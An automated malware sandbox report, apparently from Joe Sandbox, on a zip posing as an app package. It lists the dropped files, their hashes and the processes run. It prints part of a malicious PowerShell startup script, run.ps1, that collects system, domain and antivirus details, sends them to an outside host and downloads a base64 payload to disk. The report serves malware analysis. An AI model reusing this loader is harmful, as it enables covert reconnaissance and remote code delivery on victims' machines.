SHA-256:	AA9EC502E20B927D236E19036B40A5DA5DDD4AE030553A6608F821BECD646EFB
SHA-512:	739A2913F882B712A4D20F831530A411081644704B9AE234F4623B4FB2400F6A36486454F6A25DC8676EF5C570D3E23698B9A35BB3C2712DDB7E050661F36924
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z...;...;...;...$...;..H'...;...$...;...$...;...;...;.......;...=...;..4....;..Rich.;..........PE..L......@...........!.................................................................................................Y......DX..<....p..........................,.......................................................D............................text...z........................... ..`.rdata...z..........................@..@.data...\|....`.......`..............@....rsrc........p.......p..............@..@.reloc..<........ ..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\XSL\KDBX_Common.xsl

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2732
Entropy (8bit):	5.456346843827797
Encrypted:	false
SSDEEP:	48:c6WzjQJQVQkc/QUEvH34JArv7fpazK1kVL5m1N5S1N5g1N5t7hwVR8HK:9WLc9vJAD7IzK0Uw2dhtK
MD5:	CEA1758196D17C4FA8C2D95BD63A57BB
SHA1:	2112719E9D42B809449159C7EE504F30B35E048E
SHA-256:	0DA45E5BBD0DD713D01121A7D31B129867DC06A601A0B38382F639FCD130555B
SHA-512:	F3FD60E3AE3AD828094ED7E2EE3B429AE7D7489623FCF3944D4BC63A35B3883EB2CF76E6DC6F5C88D30E624A4B2D0A529205F57BBCDC44C37FCF78938BB4DA29
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">..<xsl:output method="xml" encoding="UTF-8" omit-xml-declaration="yes" indent="no" />....<xsl:variable name="nl">...<xsl:text> </xsl:text>..</xsl:variable>..<xsl:variable name="brnl">...<br /><xsl:copy-of select="$nl" />..</xsl:variable>....<xsl:variable name="HtmlHeader">...<xsl:text disable-output-escaping="yes"><![CDATA[<!DOCTYPE html> </xsl:text>....<xsl:copy-of select="$nl" />...<xsl:text disable-output-escaping="yes"><![CDATA[<html xmlns="http://www.w3.org/1999/xhtml"> </xsl:text>....<xsl:copy-of select="$nl" />..</xsl:variable>....<xsl:variable name="HtmlFooter">...<xsl:text disable-output-escaping="yes"><![CDATA[</html> </xsl:text>....<xsl:copy-of select="$nl" />..</xsl:variable>.... Design Copyright (C) 2003-2023 Dominik Reichl -->..<xsl:variable name="DocStyle">..<xsl:text disable-output-escaping="yes"><![CDATA[<style type="text/css">../* <

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\XSL\KDBX_DetailsFull_HTML.xsl

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3556
Entropy (8bit):	5.08339421409998
Encrypted:	false
SSDEEP:	96:9+wpo0Nlg0vFvX353og0YssssnA9/CEyw:UwpZvh53ogoKQ
MD5:	2F7A50CCAD0D083E2C04D18EF8448E12
SHA1:	EC7C2DEA02BDA6534571378CA298FA4842557A07
SHA-256:	1497342E9C586C4412F8DC16C1EBC0767F242FF1692388D3EF0E429AE40F79EA
SHA-512:	339B35E7D1700EF5C129384F8C7F6B6586F9EBE05D27F2B40AEC508B0A6563207582C0B993920AE19596676D71627463CA58276BA599B2FF2F10202FA8E38A7B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">..<xsl:import href="KDBX_Common.xsl" />..<xsl:output method="xml" encoding="UTF-8" omit-xml-declaration="yes" indent="no" />....<xsl:template match="/">...<xsl:apply-templates select="KeePassFile" />..</xsl:template>....<xsl:template match="KeePassFile">...<xsl:copy-of select="$HtmlHeader" />...<head><xsl:copy-of select="$nl" />....<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><xsl:copy-of select="$nl" />....<xsl:apply-templates select="Meta" />....<xsl:copy-of select="$DocStyle" />...</head><xsl:copy-of select="$nl" />...<body><xsl:copy-of select="$nl" />.....<xsl:apply-templates select="Root" />.....</body><xsl:copy-of select="$nl" />...<xsl:copy-of select="$HtmlFooter" />..</xsl:template>....<xsl:template match="Meta">...<title>....<xsl:if test="DatabaseName != ''">.....<xsl:value-of select="DatabaseName" />....</xsl:if>....<xsl:if test="Datab

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\XSL\KDBX_DetailsLight_HTML.xsl

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3098
Entropy (8bit):	5.084291937685347
Encrypted:	false
SSDEEP:	48:c6x7wwYLlC1f3hy0NlBiMVE6yyPGhXiVueZfumlBZu8tL353ogsTFYssssNw:9+wpo0Nlg0vFvX353og0YssssNw
MD5:	E25E217094D308D87F52D65A119E55A8
SHA1:	8FDF47EBE5D429E8B8E734E2770F9C9DFC667CF1
SHA-256:	3487999E80DB1AABE0632E37630326540E1BD15F0EAD5972262DDC28C16961B2
SHA-512:	669BD3CE186DCC201D78A5502893C3ACE74E9D53DED5565D983B400BFAB9E4D340C0B4AC14E0E79565F70A2FB294C78933DA0D6D1AFAB4597A68E2DA12696891
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">..<xsl:import href="KDBX_Common.xsl" />..<xsl:output method="xml" encoding="UTF-8" omit-xml-declaration="yes" indent="no" />....<xsl:template match="/">...<xsl:apply-templates select="KeePassFile" />..</xsl:template>....<xsl:template match="KeePassFile">...<xsl:copy-of select="$HtmlHeader" />...<head><xsl:copy-of select="$nl" />....<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><xsl:copy-of select="$nl" />....<xsl:apply-templates select="Meta" />....<xsl:copy-of select="$DocStyle" />...</head><xsl:copy-of select="$nl" />...<body><xsl:copy-of select="$nl" />.....<xsl:apply-templates select="Root" />.....</body><xsl:copy-of select="$nl" />...<xsl:copy-of select="$HtmlFooter" />..</xsl:template>....<xsl:template match="Meta">...<title>....<xsl:if test="DatabaseName != ''">.....<xsl:value-of select="DatabaseName" />....</xsl:if>....<xsl:if test="Datab

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\XSL\KDBX_PasswordsOnly_TXT.xsl

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	919
Entropy (8bit):	5.044554069018198
Encrypted:	false
SSDEEP:	24:2d6+KOjhGaffeB7wwG871gM1VNihbHdb4n:c60I7wwGOiM/ujW
MD5:	4B62EE7C2F7E976AA75419BF08A023D3
SHA1:	D44A6572DAA202EE8665A0F56C84FEEE5F5872F0
SHA-256:	A3AA21074EF97BE27A8FAA249430E424A6A738FEF9CA4557B7DAF6FDA43DBC98
SHA-512:	D427F043FAF0E7FAED22F99F3343D7399CD7797313A37F193E9E59A26C725170C6FCFB6ED47132EB105C7A7A76E14AC4E83E55D498490303B572ADEF2F320AF2
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">..<xsl:output method="text" encoding="UTF-8" omit-xml-declaration="yes" indent="no" />....<xsl:variable name="nl">...<xsl:text> </xsl:text>..</xsl:variable>....<xsl:template match="/">...<xsl:apply-templates select="KeePassFile" />..</xsl:template>....<xsl:template match="KeePassFile">...<xsl:apply-templates select="Root" />..</xsl:template>....<xsl:template match="Root">...<xsl:apply-templates select="Group" />..</xsl:template>....<xsl:template match="Group">...<xsl:apply-templates select="Entry" />...<xsl:apply-templates select="Group" />..</xsl:template>....<xsl:template match="Entry">...<xsl:for-each select="String[(Key = 'Password') and (Value != '')]">....<xsl:value-of select="Value" />....<xsl:copy-of select="$nl" />...</xsl:for-each>..</xsl:template>....</xsl:stylesheet>..

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\XSL\KDBX_Tabular_HTML.xsl

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3100
Entropy (8bit):	5.067688409266833
Encrypted:	false
SSDEEP:	48:c6x7wwYLlC1f3hy0NlBucvjASlGMQhCQyyI1XI1uOm3Tf8tIY:9+wpo0NlJE
MD5:	536E2B66B8EF42506EA17E132AFBDC20
SHA1:	E045F584FAD9737AA65D3753B661F3F851ED8963
SHA-256:	ECA2061F12F1135997FAC579248598DCEDC57F93C74A60CE90C5E9FDF01A3B88
SHA-512:	3ADADDA15ABD25D6937A339411DDEB3D3DFD31801E8B767D24DE848A059E131837210178F5703034736936F371046FE07695243385EA58E538437565DD059504
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">..<xsl:import href="KDBX_Common.xsl" />..<xsl:output method="xml" encoding="UTF-8" omit-xml-declaration="yes" indent="no" />....<xsl:template match="/">...<xsl:apply-templates select="KeePassFile" />..</xsl:template>....<xsl:template match="KeePassFile">...<xsl:copy-of select="$HtmlHeader" />...<head><xsl:copy-of select="$nl" />....<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><xsl:copy-of select="$nl" />....<xsl:apply-templates select="Meta" />....<xsl:copy-of select="$DocStyle" />...</head><xsl:copy-of select="$nl" />...<body><xsl:copy-of select="$nl" />.....<xsl:apply-templates select="Root" />.....</body><xsl:copy-of select="$nl" />...<xsl:copy-of select="$HtmlFooter" />..</xsl:template>....<xsl:template match="Meta">...<title>....<xsl:if test="DatabaseName != ''">.....<xsl:value-of select="DatabaseName" />....</xsl:if>....<xsl:if test="Datab

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\[Content_Types].xml

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (925), with CRLF line terminators
Category:	dropped
Size (bytes):	982
Entropy (8bit):	4.901578391266492
Encrypted:	false
SSDEEP:	24:2dtp6f2+6qDy9h5tclihR22/q2mXl2QAk:ci++6qDOh5tclihQ2y282QV
MD5:	E1781DD204999E6FC7AC0C11AD74EC36
SHA1:	484D818A99BC2ABAA53D447FE84F24A9C4C248EB
SHA-256:	61B3AB6A452BCD1A20A050717B4480BC42E8257544638705CD5CA789C74E944C
SHA-512:	8E1C9500A57EC801E8BF874EA79AFF628E04612A5128D35E2420B76358E1B6C27FDC5CA14DE11BD2CDC49B3262E2E18B52C07BB710E86D1E447E7E226114786D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="dat" ContentType="appv/vfs-file"/><Default Extension="exe" ContentType="appv/vfs-file"/><Default Extension="png" ContentType="appv/vfs-file"/><Default Extension="json" ContentType="appv/vfs-file"/><Default Extension="txt" ContentType="appv/vfs-file"/><Default Extension="dll" ContentType="appv/vfs-file"/><Default Extension="pri" ContentType="appv/vfs-file"/><Default Extension="ps1" ContentType="appv/vfs-file"/><Default Extension="xsl" ContentType="appv/vfs-file"/><Default Extension="xml" ContentType="application/vnd.ms-appx.manifest+xml"/><Override PartName="/AppxBlockMap.xml" ContentType="application/vnd.ms-appx.blockmap+xml"/><Override PartName="/AppxSignature.p7x" ContentType="application/vnd.ms-appx.signature"/><Override PartName="/AppxMetadata/CodeIntegrity.cat" ContentType="application/vnd.ms-pkiseccat"/></Types>

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\config.json

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	354
Entropy (8bit):	3.702141357819061
Encrypted:	false
SSDEEP:	6:3FF4rJXAC9fFrsWcCP/BlJXMpUdR53tNmZO0wKjHm+sudabFtY:1WJweb9XzJ8pjpwMU3Y
MD5:	4EAE6C77907D19EB939955AF945E9AC5
SHA1:	1CF64DDD72318714FD81F594B5B553E78F7FE66C
SHA-256:	8518250698B98A9DE56158E2A7889BC5CB90E8ED1B3402252B8195B856AEFADA
SHA-512:	D63B4FCC934780676BB66701132F7EB2F0107F98C221047806151E4233E184027602E94A379D553843F9CEFF4B1D49150FBBDBC5059FD9BB7B0B5375D545CEBE
Malicious:	false
Preview:	{.. "processes": [.. {.. "executable": ".*",.. "fixups": [].. }.. ],.. "applications": [.. {.. "id": "Manager",.. "startScript": {.. "scriptExecutionMode": "-ExecutionPolicy RemoteSigned",.. "scriptPath": "run.ps1".. }.. }.. ]..}

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\resources.pri

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	data
Category:	dropped
Size (bytes):	1584
Entropy (8bit):	4.311745851555602
Encrypted:	false
SSDEEP:	48:WflUII4IIdTzkeDJAXC7hox3uL4AmhrfGFQtQVjIIOgII/l:WtRIFIJ7DCSCeihVIkI/l
MD5:	FE2CE69E145CAE30101CC5146367D49E
SHA1:	43AFA2650F05FF1B687B3D3C547902B81CD31FF0
SHA-256:	54B4485496435BCD586FDC696774B1790AA311266E8AFF716482AF0B087B09E6
SHA-512:	22C817EFC91F5750E349D117DDF0ADE4D0F962B04F6C65E27F17316C7FBEA310B43E6472FA5F1038FF6FABE872BB7ADD1CD81945B304A495457939ED6E842318
Malicious:	false
Preview:	mrm_pri2....0... ...............[mrm_decn_info].................[mrm_pridescex].............H...[mrm_hschemaex] ............ ...[mrm_res_map2_].................[mrm_dataitem] .................[mrm_dataitem] .................[mrm_decn_info].................................................................................................................................1.0.0...E.N.-.U.S..............[mrm_pridescex].........H...........................................H...[mrm_hschemaex] ........ ...............[def_hnamesx] ..........H..........m.s.-.a.p.p.x.:././.m.a.n.a.g.e.r./...m.a.n.a.g.e.r.....)...........................................F..0........R..0........A..0......).M.. ......'.M.. 5.......S.. P.......D.. ...... .P.. ......&.V.. c.....&.V.. ...................................................Files.Assets.Resources.ManagerSquare150x150Logo.png.ManagerSquare44x44Logo.png.Store50x50Logo.png.VisualElements_1.Description.VisualElements_1.DisplayName.PublisherDisplayName_1.DisplayNam

C:\Users\user\AppData\Local\Temp\jitnto4w.y21\run.ps1

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1489
Entropy (8bit):	5.3147470703399575
Encrypted:	false
SSDEEP:	24:W0F9ksDMrOGPBWuwde4VnGf2LAcQPKC2ZLHZgoIqRtxJCcPqyLcGSHzFZ:W89ksDoOVde4VyP3gHZCexACcxRZ
MD5:	39D3B2D48E84EEE60AEEB38E8A5CDD1D
SHA1:	1A9A9713FFEB8B5C9F9F50529E858D70FD84D939
SHA-256:	78D55B107FB5258AD470F04B6A601855E42CB5194C94C5E274AABE7EF19E0001
SHA-512:	7AFFBDECBC85BC1669D47279050346DDDCAA02FA28B1E1941C5F9BE91C8C463B0C49409765783C489CBB1C5E2A4D352D30B9839D4D6DAEE8B5293BC1CC46CC3C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\AppData\Local\Temp\jitnto4w.y21\run.ps1, Author: Joe Security
Preview:	.$job = Start-Job -ScriptBlock {.. $osCaption = (Get-WmiObject -Class Win32_OperatingSystem).Caption.. $urlEncodedOsCaption = [System.Net.WebUtility]::UrlEncode($osCaption).. $domain = Get-WmiObject Win32_ComputerSystem \| Select-Object -ExpandProperty Domain.. $AV = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct.. $dis = $AV \| ForEach-Object {.. $_.displayName.. }.. $Names = $dis -join ", ".. $webClient = New-Object Net.WebClient.. $url = "https://sun47281.space/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?av=$Names&domain=$domain&os=$urlEncodedOsCaption&m=7".. $encodedString = $webClient.DownloadString($url).. $decodedString = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encodedString)).. $searchWord = "usradm".. if ($decodedString.Contains($searchWord)) {.. $path = "C:\ProgramData\psps.ps1".. $decodedString \| Out-File -FilePath $path..

C:\Users\user\AppData\Local\Temp\unarchiver.log

Download File

Process:	C:\Windows\SysWOW64\unarchiver.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4280
Entropy (8bit):	5.3220445364443805
Encrypted:	false
SSDEEP:	48:NZdtVZ/Gs/Gbs/Gs/GpC/Gq/Gs/Gp34GblG84GfG/bGFGe2GnGY1GnGkGNYGfWUG:fd2vR6YRWv+2OGf2a
MD5:	F46ABEBA96C2076FF33DE55C33AF6DCD
SHA1:	B53BCF9AF10AB7121504F68FB9E2B724DD79DD7D
SHA-256:	CEEA60D4E1EE1E08EBA1799F281C4341C1FA0C470F563FB5286E0102ECCA36ED
SHA-512:	0DD636E943F1806EDCFDF7525076A92DCEDDDA9B04CB8537A275E13B9748DA0DE7AE10E923699BC2C9B49FACCE83715F5020E89E872862A4F8C675FABBD838A9
Malicious:	false
Preview:	12/11/2023 8:31 PM: Unpack: C:\Users\user\Desktop\crm_5.2.14.0_x64__c4g82jgbfsn1c.zip..12/11/2023 8:31 PM: Tmp dir: C:\Users\user\AppData\Local\Temp\jitnto4w.y21..12/11/2023 8:31 PM: Received from standard out: ..12/11/2023 8:31 PM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..12/11/2023 8:31 PM: Received from standard out: ..12/11/2023 8:31 PM: Received from standard out: Scanning the drive for archives:..12/11/2023 8:31 PM: Received from standard out: 1 file, 61630843 bytes (59 MiB)..12/11/2023 8:31 PM: Received from standard out: ..12/11/2023 8:31 PM: Received from standard out: Extracting archive: C:\Users\user\Desktop\crm_5.2.14.0_x64__c4g82jgbfsn1c.zip..12/11/2023 8:32 PM: Received from standard out: --..12/11/2023 8:32 PM: Received from standard out: Path = C:\Users\user\Desktop\crm_5.2.14.0_x64__c4g82jgbfsn1c.zip..12/11/2023 8:32 PM: Received from standard out: Type = zip..12/11/2023 8:32 PM: Received from standard ou

Static File Info

General

File type:	Zip archive data, at least v4.5 to extract, compression method=deflate
Entropy (8bit):	7.999992040304714
TrID:	ZIP compressed archive (8000/1) 99.91% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
File name:	crm_5.2.14.0_x64__c4g82jgbfsn1c.zip
File size:	61'630'843 bytes
MD5:	81b151d8d20a9141112a091f4844408a
SHA1:	02f2e210128cb93076e69ce529ffb7b054c6fcc2
SHA256:	f2f456731aa3fba67a245917e7721d818cfb633d67825edbc0602b8813ca6a5d
SHA512:	3f5754bcaecef545b6ab5d629cfb92de27afb7db400f02ac4fb9caf03db80c9787ce54b9692f4239686313e505f8bddbd2d0aa67423ac69e212a89ca0b969978
SSDEEP:	1572864:wxLrtQ/YlWNLFSn7sW9Ca+RCyhHCcqJTAh3B7rH:e1ikNwRTBr
TLSH:	0ED733BD410506A1A723AA7A3E870EC4AD27D04303FF999B20756F0FFD9974E253D866
File Content Preview:	PK..-......-~W................Registry.dat.YMl.U.....J....P$,......6..P+nqD.XNRB.5[{m........!Y....Sn...bNT.z4.P.B...c......o..K..u...B..........f.l.Zj..!".9.....}..G.ux.i..b....i.pR0'b.".....g...RzR....2.2.2.2.2.2.2.2.2.2.2....5.....>h.<880q.*....I.w".

File Icon


Icon Hash:	90cececece8e8eb0

• unarchiver.exe
• 7za.exe
• conhost.exe

Click to jump to process

Memory Usage

• unarchiver.exe
• 7za.exe
• conhost.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Click to jump to process

Target ID:	0
Start time:	20:31:57
Start date:	11/12/2023
Path:	C:\Windows\SysWOW64\unarchiver.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\crm_5.2.14.0_x64__c4g82jgbfsn1c.zip
Imagebase:	0x350000
File size:	12'800 bytes
MD5 hash:	16FF3CC6CC330A08EED70CBC1D35F5D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	20:31:58
Start date:	11/12/2023
Path:	C:\Windows\SysWOW64\7za.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jitnto4w.y21" "C:\Users\user\Desktop\crm_5.2.14.0_x64__c4g82jgbfsn1c.zip
Imagebase:	0x890000
File size:	289'792 bytes
MD5 hash:	77E556CDFDC5C592F5C46DB4127C6F4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	20:31:58
Start date:	11/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	20.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.3%
Total number of Nodes:	76
Total number of Limit Nodes:	4

Callgraph

Hide Legend

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00C3B1D6 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 00C3B208

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: d1cc4e37db336fd0748f87066a055d2f73317fa49810b791c4bc8ab283a92533
Instruction ID: 9b0ecb21fcc973cd1d966af9d2dc8463455b7a31a03a4fdcf484f4ac453fba37
Opcode Fuzzy Hash: d1cc4e37db336fd0748f87066a055d2f73317fa49810b791c4bc8ab283a92533
Instruction Fuzzy Hash: E1018F719042449FDB10CF55D984766FBE4EF44320F08C5AADE488F652D37AA804CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04B10798 Relevance: 4.0, Strings: 3, Instructions: 284
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\O_l, xrefs: 04B10966
:@8l, xrefs: 04B108B5
:@8l, xrefs: 04B10822

Memory Dump Source

Source File: 00000000.00000002.1447628302.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_unarchiver.jbxd

Similarity

API ID:
String ID: :@8l$:@8l$\O_l
API String ID: 0-3670647442
Opcode ID: 3c09c3bbd7d4b65b66cc0aaae4ec9a99b4d8f73313d3ba9c59ebdae17c4f96bf
Instruction ID: 1872ee513527519feffc9a28838fc5c35ce934f266ca003ae71837da6966d0f8
Opcode Fuzzy Hash: 3c09c3bbd7d4b65b66cc0aaae4ec9a99b4d8f73313d3ba9c59ebdae17c4f96bf
Instruction Fuzzy Hash: AEA18D34B04204CBDB08ABB4D8547BF77A2FFC9308F148469D9469BBA4DF349D868B91

Uniqueness

Uniqueness Score: -1.00%

Function 00C3B246 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 00C3B2F3

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f564a058dd94df18296d71a4eafdd3cf4f3007505243c57b3b3c09eca9008426
Instruction ID: 304aa16f593dba0cd3c8d7e0d236fd38918ab7af636de3d88150b965a59048cc
Opcode Fuzzy Hash: f564a058dd94df18296d71a4eafdd3cf4f3007505243c57b3b3c09eca9008426
Instruction Fuzzy Hash: CF31B4714043446FEB228B61DC44FA6BFBCEF05314F04849AE985CB562D324A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00C3AD04 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 00C3ADA7

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b5d032fc153c1a72350ea6a8a0b96094ac9b8e4c78853b0cb7a19de3df6d82a6
Instruction ID: a1f31c04549e7d7aafc73727360a1d4c1390135a638dc275af9a27bf351fca89
Opcode Fuzzy Hash: b5d032fc153c1a72350ea6a8a0b96094ac9b8e4c78853b0cb7a19de3df6d82a6
Instruction Fuzzy Hash: A431D371404384BFEB228B61DC44FA7BFBCEF09324F04889AF985DB552D324A819CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C3AB76 Relevance: 1.6, APIs: 1, Instructions: 92
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 00C3AC36

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: CreatePipe
String ID:
API String ID: 2719314638-0
Opcode ID: d03feca2eaceed04f10a0d10a8f17ae6cd9e10bb6f3edfc0633e5be3d17caa15
Instruction ID: 5a77672b98219de501307cf03954d055607780fcf260af10b71cf96a5f33b908
Opcode Fuzzy Hash: d03feca2eaceed04f10a0d10a8f17ae6cd9e10bb6f3edfc0633e5be3d17caa15
Instruction Fuzzy Hash: 24318F7240E3C05FD7038B758C65A51BFB4AF47610F1A84CBD884DF5A3D2296819CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A5DC Relevance: 1.6, APIs: 1, Instructions: 90
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00C3A67D

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e90276a7da132dc61c2ecda64f842bafdf3bb8224f8dd8cf76fb3cb453462325
Instruction ID: 21ef9b3fc66752ee7cf174ad3de0d616f12f359ab0913acd557b76161f3ed6af
Opcode Fuzzy Hash: e90276a7da132dc61c2ecda64f842bafdf3bb8224f8dd8cf76fb3cb453462325
Instruction Fuzzy Hash: 7131AF71505340AFE721CF65CC45F62BBF8EF05220F08889EF9858B652D365E919CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A120 Relevance: 1.6, APIs: 1, Instructions: 84
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 00C3A1C2

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: e7fc6dde6c4659311feebd680e8f2e142eb8a14ceced5d1547c124818c3e0a4a
Instruction ID: 0130ca89d21f816c1d7383bb39a36725cbf1b576155d9b09751afe00eb358152
Opcode Fuzzy Hash: e7fc6dde6c4659311feebd680e8f2e142eb8a14ceced5d1547c124818c3e0a4a
Instruction Fuzzy Hash: A421E27150D3C06FD3128B258C51BA2BFB4EF87620F0985DBE884CF693D325A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A370 Relevance: 1.6, APIs: 1, Instructions: 80
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E24,F67F14CE,00000000,00000000,00000000,00000000), ref: 00C3A40C

Memory Dump Source

Source File: 00000000.00000002.1446826968.0000000000C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3a000_unarchiver.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 535e5de7ba0c59d469d5f5275e6bc505859aef3ec40ace2581ecb9dedad1a686
Instruction ID: 6a930c9aec718c9029d0ceef31487daa718de2667f531138a67025fdc3806ae0
